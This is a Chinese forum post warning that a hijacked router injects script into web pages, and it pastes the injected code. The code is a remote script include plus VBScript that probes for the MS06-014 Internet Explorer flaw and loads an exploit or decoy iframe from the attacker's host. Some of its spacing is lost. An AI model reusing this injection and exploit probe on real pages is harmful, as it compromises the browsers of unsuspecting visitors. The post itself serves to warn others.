【警告】最近发现路由被黑!凡是经过路由的网页都被强行加入了代码!
【警告】最近发现路由被黑!凡是经过路由的网页都被强行加入了代码!
<script src=http://1.520sb.cn/1.js></script>
我分析是黑客用于查找MS06014漏洞肉鸡的!请大家注意!!!
页面代码如下:
--------------------------------------
<scriptlanguage="javascript"src="http://count3.51yes.com/click.aspx?id=31718392&logo=1"></script>
<scriptsrc='http://s111.cnzz.com/stat.php?id=428049&web_id=428049&show=pic'language='JavaScript'charset='gb2312'></script>
<scriptlanguage=VBScript>
onerrorresumenext
setzero=document.createElement("ob"&"ject")
zero.setAttribute"cl"&"assid","cl"&"sid:BD"&"96C556-65A3-11D0-983A-00C04"&"FC29E36"
str3="Ad"&"odb.St"&"ream"
setF=zero.create
object(str3,"")
if NotErr.Number=0 then
err.clear
'msgbox"看到这个提示证明你的机器没有06014漏洞,页面自动打开百度!"
document.write("<iframe src=http://1.520sb.cn/mm/mm.htm width=100% height=100% scrolling=no frameborder=0>")
else
'msgbox"看到这个提示证明你的机器有06014漏洞,页面自动打开google!"
document.write("<iframe src=http://1.520sb.cn/mm/06014.htm width=100% height=100% scrolling=no frameborder=0>")
endif
</script>
------------------------------------
